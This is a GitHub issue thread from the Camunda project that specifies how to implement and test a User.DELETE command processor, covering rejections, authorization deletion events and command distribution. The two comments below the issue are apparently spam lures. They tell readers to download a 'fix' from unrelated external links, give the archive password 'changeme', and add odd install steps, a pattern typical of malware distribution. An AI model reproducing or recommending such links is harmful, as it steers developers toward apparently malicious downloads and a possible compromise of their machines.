### ISSUE TITLE
Process `User.DELETE` command

### ISSUE THREAD

**Issue by remcowesterhoud** [camunda/camunda#21679]
<h2>Description</h2>

- [x] Extend `UserIntent` with a `DELETE` intent (ordering-wise it's nice to put it above the `DELETED` event)
- [x] Create a `UserDeleteProcessor` 
    - Verify if a user with this `username` exists
        - [x] If not, write a rejection with a proper eror message indicating the user doesn't exist
        - If yes
            - [x] Write `AuthorizationIntent.DELETED` events for each of the user's authorizations
            - [x] Write a `UserIntent.DELETED` event and distirbute the command on the Identity `DistributionQueue`
- [x] Write tests that verify processing the command works as expected. Verify the rejection, a success case, and the distribution acknowledgement.

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
